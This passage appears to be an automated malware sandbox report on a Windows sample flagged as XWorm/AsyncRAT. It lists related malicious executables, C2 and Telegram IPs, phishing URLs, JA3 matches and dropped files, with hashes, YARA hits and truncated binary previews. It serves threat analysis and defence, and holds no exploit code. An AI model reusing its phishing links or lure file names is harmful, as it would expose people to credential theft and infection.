                                                                            Makrokdernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 149.154.167.220

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            SALSGIVERUSpython.exeGet hashmaliciousXWormBrowse
                                                                            • 147.185.221.21
                                                                            setup.exeGet hashmaliciousXWormBrowse
                                                                            • 147.185.221.21
                                                                            real-al-d7ya.exeGet hashmaliciousXWormBrowse
                                                                            • 147.185.221.20
                                                                            Avowed Beta.exeGet hashmaliciousXWormBrowse
                                                                            • 147.185.221.21
                                                                            nebula.exeGet hashmaliciousXWormBrowse
                                                                            • 147.185.221.21
                                                                            WaveInstaller.exeGet hashmaliciousXWormBrowse
                                                                            • 147.185.221.19
                                                                            PC driver.exeGet hashmaliciousXWormBrowse
                                                                            • 147.185.221.19
                                                                            Server.exeGet hashmaliciousNjratBrowse
                                                                            • 147.185.221.21
                                                                            hack fivem.exeGet hashmaliciousNjratBrowse
                                                                            • 147.185.221.21
                                                                            WindowsHealthProtect.exeGet hashmaliciousXWormBrowse
                                                                            • 147.185.221.20
                                                                            TELEGRAMRURevised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            rVesselSchedule.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            bodrum_buro.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Proforma fatura.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            New order 01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            http://b17.videoprivate-live.com/Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            https://qzf1.haveplentymusic.com/Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            https://choicesfdc.com.au/readm.html?colors=c2FyYS5nZWlnZXJAc2JhZmxhLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                            • 149.154.167.220
                                                                            http://www.nicetours.netGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            rTransaction_ReceiptCopy.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            ANONYMIZEEpikNetworkCH27062024_1338_ItsComedy.exeGet hashmaliciousAsyncRATBrowse
                                                                            • 45.88.186.62
                                                                            https://campaign-statistics.com/link_click/RqeqbFIupG_SarXt/c7754e02779513a9011493d63e2dacdcGet hashmaliciousAsyncRATBrowse
                                                                            • 45.88.186.168
                                                                            GfU2VYzM9r.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.149.192.15
                                                                            Documento di richiesta di preventivo NR_531 28 05 24.exeGet hashmaliciousFormBookBrowse
                                                                            • 185.83.214.222
                                                                            SecuriteInfo.com.Heuristic.HEUR.AGEN.1309146.31110.1872.exeGet hashmaliciousRedLine, XWormBrowse
                                                                            • 45.88.186.125
                                                                            ehQfAH429r.exeGet hashmaliciousRedLine, XWormBrowse
                                                                            • 45.88.186.125
                                                                            6tJtH22I7a.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                            • 45.88.186.125
                                                                            t2SFfMxQP1.exeGet hashmaliciousPureLog Stealer, RedLine, XWormBrowse
                                                                            • 45.88.186.125
                                                                            LFfjUMuUFU.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWormBrowse
                                                                            • 45.88.186.125
                                                                            x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 91.149.192.120

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            3b5074b1b5d032e5620f69f9f700ff0ehttps://shared.outlook.inky.com/link?domain=doni2.r.ag.d.sendibm3.com&t=h.eJwdj8tOwzAQAH-l8hl5Yztpkp56QjwEqBdKuSA_1onVjY0cB4QQ_07T80gzml-2ZGK7DRtL-Zx3AC7FIHnmeuCOzxhdMJPiNk0wncESeJhHePmx7193y20SeCj57RSOz-70-PQA5v7wUVWvNNJRsZsNO6_qiCXlwRch2-22FTDpEAtGHS3uR8yh6AG_dcE8B4fXVNcYIVXToOq80dhLbVqPlaxcjZ1DBaKVQtR133dcijWE1wckSnvr0SyB3MW3ylbqLjQuRH__e5FMBA.MEUCICPVdJ8A6eCIy5PEte1B5Fmj9jEJmTviOeNz1I2ChDF5AiEAq8t8ZLlriqRms2EdUTwM4-x3XuuMwf9TxieA_Ny75ngGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                            • 149.154.167.220
                                                                            MCU1IoNwCn.jsGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            https://www.canva.com/design/DAGLF3snAws/kgV8XMEaCHOJeaPJkLlFKQ/edit?utm_content=DAGLF3snAws&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttonGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            https://ambassadorlimo.com/Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            Docs Shipping PO#QSB-8927393_2324, QSB-8927394_23-24.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 149.154.167.220
                                                                            https://email.app.bamboohr.com/c/eJyMkEFPwyAcxT8N3NrAn1L0wGFuLmFxGnXLzC4LUJpiB9SWLe7bm5kdPXh7yXvv8PvZFMIpequzT_HgGwlg7b3gpKgYdwWlri00qUXR1tRyECCEMdimMOh4ue6tbw5QUy4ItqcppyDdZUX2O96Z-Lbaz1WtPhWsN1u2nqtJheez-XjoTDz-0fHO7Lb-xauLWijfviK2QGyBG2krgZ2kAigFLkiNO8mYBm3rhld3wJkzQgjKK2oYMdw547D_FwqqiB6G0uhgUurG0qaAj7LLeZgQmyFYIlj2vh99_51KH9uEYDmMDo9Sx97nctA5elSRrzyl4_n3nuVs8354XM_UE84u6pivnm7ppuos4ScAAP__pKt0pQ=Get hashmaliciousHTMLPhisherBrowse
                                                                            • 149.154.167.220
                                                                            1027852000XLS.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 149.154.167.220
                                                                            XloyRIBlmdu28Vh.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 149.154.167.220
                                                                            https://beededelva.za.com/secured/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 149.154.167.220

                                                                            Dropped Files

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeMichael_Gorn_Resume.isoGet hashmaliciousUnknownBrowse
                                                                              Michael_Gorn_Resume.docx.lnkGet hashmaliciousUnknownBrowse

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wjoqZlIS.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):2666
                                                                                Entropy (8bit):5.345804351520589
                                                                                Encrypted:false
                                                                                SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHxLHG1qHjHKd2:vq5qxqdqolqztYqh3oPtI6mq7qoT5RL9
                                                                                MD5:3D3B62B70DF65C6D62C6B068D7256706
                                                                                SHA1:03CCEE715BD3299367368426E025742C869155B0
                                                                                SHA-256:7373A8D46BC57A95D1C80A2FCD34FF0238B7A0981147FBEA9C28F32F46C653BB
                                                                                SHA-512:E259F86B1107BCBFA7F72AB3D199F13AF10644848398DD02D22012B626F353A9EE6865A16E5EA39A7657727D3DA6384F7EA424D8ADEA8F4162C106E90737D559
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):64
                                                                                Entropy (8bit):0.34726597513537405
                                                                                Encrypted:false
                                                                                SSDEEP:3:Nlll:Nll
                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:@...e...........................................................

                                                                                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\settings.dat

                                                                                Download File
                                                                                Process:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):8192
                                                                                Entropy (8bit):0.7321271493407865
                                                                                Encrypted:false
                                                                                SSDEEP:24:1E44W4F1Ln5lDuUbwB7uh/+wB7tXadnW/6ZPo:TJ4rH87ub70
                                                                                MD5:3491AA8F2B3007257847EA899C9C7260
                                                                                SHA1:6151808DDE97AD86461FA3BA89FC3990602B3D9F
                                                                                SHA-256:36A3BA27CDCD023598DEF219E8268A227773C2AE2C72465B65F8949476F1C57B
                                                                                SHA-512:B27C0AA36B391ED7E54F96B35C079ACA833032201D7AB044480A8DD3D70DF635F1ABA564F35CCB15E2B296C2B1FBD4F8AFCE196FFB3409E449FE030BB0177BB0
                                                                                Malicious:false
                                                                                Preview:regf........b.Q.7.................. ...........y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtmf.V................................................................................................................................................................................................................................................................................................................................................~.d.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                                                                                Download File
                                                                                Process:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):8192
                                                                                Entropy (8bit):0.7697346988458389
                                                                                Encrypted:false
                                                                                SSDEEP:24:6e44W4F1z9YM07n5lDuUbwB7uh/+wB7tXadnW/6ZPo:IJ4OTjH87ub70
                                                                                MD5:52036240BD70CE776C77A45563B888E2
                                                                                SHA1:B0C4609BF975DE8DEC5F67E176E033DAD8C131BC
                                                                                SHA-256:1CA0368283EE5E7B794D2A7F4155B349D73DB5942B41D75EE6383DAEEA1FAC6C
                                                                                SHA-512:02772CE9DC6B02EA86BCC9837612CA6E8B3709EDA2F9570B20D90F422F1364E013C4BFFCC41F2849B34FBCDCF1ED455F976E31C8ABC38925FE3C5B1381703970
                                                                                Malicious:false
                                                                                Preview:regf........b.Q.7.................. ...........y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtmf.V................................................................................................................................................................................................................................................................................................................................................y.d.HvLE....................L...w..J...0%.[.........hbin................b.Q.7..........nk,.T...7..................................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............vk......0...........VeryFirstLaunch.........V...................vk................y Mode....p...sk..x...x.......t.......H...X.............4.........?.......................

                                                                                C:\Users\user\AppData\Local\Temp\YsrQekGS.exe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\Ekpb7jn7mf.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):42496
                                                                                Entropy (8bit):5.578448002075782
                                                                                Encrypted:false
                                                                                SSDEEP:768:OTOwtnrg5uKlP0Rl0GQvvdF3q9iR6TO+hiIMAz:OTOIMQKx077QvFF69iR6TO+QMz
                                                                                MD5:6EA393666ED89F758B30EA5037F5C22A
                                                                                SHA1:ECEEAE7BDEC94AD08B8E8F9ABF057474C602228B
                                                                                SHA-256:AF8318698C0BA525D71F5075BE304B4A096DD87A2F058854594C50C33F7CB387
                                                                                SHA-512:828D857ED80010E1DDE132098CED55AAB759FA0F4E99921AEE8DE75A946CBF4ECB41F20F0D16837E58C562EF7EB538A86729B8636E06E322C8C154029DECDD6E
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[Kkf................................. ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........[...]............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dbfenx1s.x1v.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egxa0rnu.b4r.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fefgjlzs.cge.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hz4ykdzn.hpp.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0njazfq.u2i.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4j30btc.rgc.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmqoftrg.xrx.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqixtfub.nrs.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\Ekpb7jn7mf.exe
                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):27648
                                                                                Entropy (8bit):3.8743902487326958
                                                                                Encrypted:false
                                                                                SSDEEP:384:S3B2ChTCfxWqHPuOOLE8eWS0YWbiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiLih:a2CwxTmOv8zG
                                                                                MD5:DEAD69D07BC33B762ABD466FB6F53E11
                                                                                SHA1:F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302
                                                                                SHA-256:3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51
                                                                                SHA-512:F33A402E96474FC10F870293058B7252517456B4053D85885EBF21D0F9166F9A8A86457327A3E307624864B30CA9888AE0399A90C6248C50B781B28D9981C0C6
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Joe Sandbox View:
                                                                                • Filename: Michael_Gorn_Resume.iso, Detection: malicious, Browse
                                                                                • Filename: Michael_Gorn_Resume.docx.lnk, Detection: malicious, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~.h...h...h.......h...h...h.......h.......h.......h.......h.......h.....h.......h..Rich.h..................PE..d.....Y..........."..........b......0..........@.....................................j....`.......... ......................................d'.......P...G...@..................,....#..T............................ ...............!..@............................text............................... ..`.rdata..F.... ......................@..@.data...8....0......................@....pdata.......@....... ..............@..@.rsrc....G...P...H..."..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmp331E.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmp332F.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmp333F.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmp3350.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
